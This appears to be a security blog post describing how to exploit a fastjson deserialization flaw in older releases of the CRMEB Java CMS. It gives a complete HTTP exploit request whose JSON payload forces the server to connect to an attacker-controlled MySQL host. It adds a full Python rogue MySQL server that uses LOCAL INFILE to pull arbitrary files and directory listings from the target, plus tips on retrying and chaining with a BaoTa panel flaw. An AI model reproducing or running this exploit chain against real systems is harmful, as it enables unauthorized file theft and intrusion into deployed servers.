CRMEB Java edition CMS: fastjson exploitation
A project with 4.5K stars and 2K forks. Earlier releases shipped an old fastjson version; the current release has fixed this.
https://gitee.com/ZhongBangKeJi/crmeb_java
Earlier releases used fastjson 1.2.56. For 1.2.68 there is a public chain (the java.lang.AutoCloseable type-check bypass combined with the commons-io gadget) that writes an arbitrary file; the payload works in local tests, but it could not be exploited in a real-world setting.
Quoting su18: https://github.com/su18/fastjson-commons-io/tree/e6724ac297e1aa7ae44a62a3ad6cc3f537d3c737
Note: because the constructor that fastjson picks for WriterOutputStream is not unique, this payload does not fire every time; you have to wait until the randomly chosen constructor is the one with the intended parameters. Anyone testing it should just try several times and the write will happen. If you have a way to solve this, please contact me.
For a Spring Boot target it is also of limited use, since the application runs from an executable jar rather than a servlet container with a writable webroot. At BlackHat 2021 a new technique was presented; the analysis is here:
https://blog.noah.360.net/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/
It fits neatly with the MySQL JDBC driver: make fastjson open a connection to a MySQL server I control. Building on the above, the payload is extended with "allowUrlInLocalInfile":"true", "allowLoadLocalInfile":"true", "allowLoadLocalInfileInPath":"/". Once the client connects, the rogue server answers its first query with a LOAD DATA LOCAL INFILE request, and with allowLoadLocalInfile enabled Connector/J reads the named path and sends its contents to the server.
That gives arbitrary file read and download (the application jar, for one). Because allowUrlInLocalInfile makes the client open the requested name as a URL, a file:// URL pointing at a directory returns a directory listing (allowLoadLocalInfileInPath only matters on newer Connector/J 8.0 releases, where it restricts LOCAL INFILE to that directory; "/" lifts the restriction, and the 5.1 com.mysql.jdbc.JDBC4Connection used here ignores the key). Combined with a BaoTa (宝塔) panel vulnerability this becomes unstoppable.
show code:
POST /api/public/wechat/gitlab?token=aa HTTP/1.1
Host: 192.168.220.2:8081
Content-Length: 479
Request-Origion: SwaggerBootstrapUi
Accept: */*
X-Requested-With: XMLHttpRequest
Authori-zation:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.220.2:8081
Referer: http://192.168.220.2:8081/doc.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.jdbc.JDBC4Connection",
  "hostToConnectTo": "xxxxx",
  "portToConnectTo": 1234,
  "databaseToConnectTo": "test",
  "info": {
    "@type": "java.util.Properties",
    "PORT": "1234",
    "allowUrlInLocalInfile": "true",
    "allowLoadLocalInfile": "true",
    "allowLoadLocalInfileInPath": "/",
    "maxAllowedPacket": "655360",
    "user": "fileread_file:///.",
    "PORT.1": "1234",
    "HOST.1": "xxxxxxxxx",
    "NUM_HOSTS": "1",
    "HOST": "xxxxx",
    "DBNAME": "test"
  }
}

The first @type satisfies fastjson's expected-class check (java.sql.Connection extends AutoCloseable); the second names the concrete class. hostToConnectTo, portToConnectTo, info and databaseToConnectTo are the parameter names of the JDBC4Connection constructor, which fastjson matches by name, and the HOST/PORT/DBNAME/NUM_HOSTS keys in the Properties are what Connector/J normally derives from a JDBC URL. The xxxxx placeholders are the attacker-controlled MySQL host.
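The rogue MySQL side of this chain, as an added example (not code from this post or from the crmeb project): a minimal fake server that completes the handshake, accepts any password, answers the client's first query with a LOCAL INFILE request for the path carried in the username, and collects what the client uploads. The `fileread_<path>` username convention, the server version string and the listening port are assumptions; the packet layouts are the standard MySQL client/server protocol. `build_handshake_response` plays the client side so the exchange can be checked offline without a JDBC client.

```python
import socket
import struct
# MySQL capability bits used here. CLIENT_SSL is deliberately absent so the JDBC client stays in plaintext.
CLIENT_CONNECT_WITH_DB, CLIENT_LOCAL_FILES, CLIENT_PROTOCOL_41 = 0x08, 0x80, 0x200
CLIENT_SECURE_CONNECTION, CLIENT_PLUGIN_AUTH, CLIENT_PLUGIN_AUTH_LENENC = 0x8000, 0x80000, 0x200000
SERVER_CAPS = CLIENT_PROTOCOL_41 | CLIENT_LOCAL_FILES | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH
COM_QUERY, LOCAL_INFILE = 0x03, 0xFB

def wrap_packet(payload: bytes, seq: int) -> bytes:
    """3-byte little-endian length, 1-byte sequence id, then the payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload

def split_packets(data: bytes) -> list:
    """Cut a byte stream into (seq, payload) tuples; a short trailing packet is an error."""
    out, pos = [], 0
    while pos < len(data):
        length = int.from_bytes(data[pos:pos + 3], "little")
        if len(data) < pos + 4 + length:
            raise ValueError("truncated packet")
        out.append((data[pos + 3], data[pos + 4:pos + 4 + length]))
        pos += 4 + length
    return out

def build_greeting(salt: bytes = b"\x01" * 20) -> bytes:
    """Server -> client: Protocol::HandshakeV10 offering mysql_native_password (version string is made up)."""
    payload = (b"\x0a5.7.99-fake\x00" + struct.pack("<I", 1234) + salt[:8] + b"\x00"
               + struct.pack("<HBHHB", SERVER_CAPS & 0xFFFF, 0x21, 0x0002, SERVER_CAPS >> 16, len(salt) + 1)
               + b"\x00" * 10 + salt[8:] + b"\x00mysql_native_password\x00")
    return wrap_packet(payload, 0)

def build_handshake_response(username: str, database: str) -> bytes:
    """Client -> server: Protocol::HandshakeResponse41 with a dummy 20-byte auth response."""
    payload = (struct.pack("<IIB", SERVER_CAPS | CLIENT_CONNECT_WITH_DB, 1 << 24, 0x21) + b"\x00" * 23
               + username.encode() + b"\x00\x14" + b"\x00" * 20
               + database.encode() + b"\x00mysql_native_password\x00")
    return wrap_packet(payload, 1)

def parse_handshake_response(payload: bytes) -> dict:
    """Username and database from HandshakeResponse41; the rogue server keys on the username."""
    caps = struct.unpack_from("<I", payload)[0]
    assert caps & CLIENT_PROTOCOL_41, "pre-4.1 handshake not supported"
    end = payload.index(b"\x00", 32)             # caps(4) + max packet(4) + charset(1) + reserved(23)
    username, pos = payload[32:end].decode(), end + 1
    if caps & (CLIENT_PLUGIN_AUTH_LENENC | CLIENT_SECURE_CONNECTION):
        pos += 1 + payload[pos]                  # 1-byte length + auth bytes (lenenc below 251 is the same byte)
    else:
        pos = payload.index(b"\x00", pos) + 1    # NUL-terminated auth (old clients)
    database = payload[pos:payload.index(b"\x00", pos)].decode() if caps & CLIENT_CONNECT_WITH_DB else None
    return {"capabilities": caps, "username": username, "database": database}

def build_ok(seq: int) -> bytes:
    """OK_Packet: 0x00, affected rows 0, insert id 0, SERVER_STATUS_AUTOCOMMIT, 0 warnings."""
    return wrap_packet(b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0), seq)

def build_local_infile_request(path: str, seq: int) -> bytes:
    """Reply to COM_QUERY that asks the client to upload `path`: a 0xFB byte plus the name."""
    return wrap_packet(bytes([LOCAL_INFILE]) + path.encode(), seq)

def collect_file_data(packets) -> bytes:
    """Join the client's upload chunks; the client marks end-of-file with an empty packet."""
    if not packets or packets[-1][1]:
        raise ValueError("upload not terminated by an empty packet")
    return b"".join(payload for _, payload in packets[:-1])

def target_from_username(username: str, default: str = "/etc/passwd") -> str:
    """Assumption: the path rides in the username as 'fileread_<path>', as in the page's payload."""
    return username[len("fileread_"):] if username.startswith("fileread_") else default

def _recv_packet(sock) -> tuple:
    buf, need = b"", 4                           # header first, then exactly the announced length
    while len(buf) < need:
        chunk = sock.recv(need - len(buf))
        if not chunk:
            raise ConnectionError("client closed the connection")
        buf += chunk
        if len(buf) == 4:
            need += int.from_bytes(buf[:3], "little")
    return buf[3], buf[4:]

def serve_once(port: int = 3306) -> bytes:
    """Accept one JDBC client, answer its first query with a LOCAL INFILE request, return the upload."""
    srv = socket.create_server(("0.0.0.0", port))
    conn, _ = srv.accept()
    with srv, conn:
        conn.sendall(build_greeting())
        seq, payload = _recv_packet(conn)
        path = target_from_username(parse_handshake_response(payload)["username"])
        conn.sendall(build_ok(seq + 1))          # accept any password
        seq, payload = _recv_packet(conn)
        while payload[:1] != bytes([COM_QUERY]):  # e.g. COM_PING: answer OK until a query arrives
            conn.sendall(build_ok(seq + 1))
            seq, payload = _recv_packet(conn)
        conn.sendall(build_local_infile_request(path, seq + 1))
        chunks = [_recv_packet(conn)]
        while chunks[-1][1]:                      # file body, terminated by an empty packet
            chunks.append(_recv_packet(conn))
        conn.sendall(build_ok(chunks[-1][0] + 1))
        return collect_file_data(chunks)
```

Run `serve_once()` on a host the target can reach and point hostToConnectTo/portToConnectTo at it; the username `fileread_file:///.` from the payload becomes the requested name `file:///.`, which the client opens as a URL because of allowUrlInLocalInfile and which therefore yields a directory listing rather than an error. The greeting omits CLIENT_SSL so the client never attempts TLS, and it never advertises CLIENT_PLUGIN_AUTH_LENENC_CLIENT_DATA, so the auth response is always a single length byte followed by the hash; if the client has allowLoadLocalInfile disabled it answers the 0xFB request with an empty packet and nothing is read.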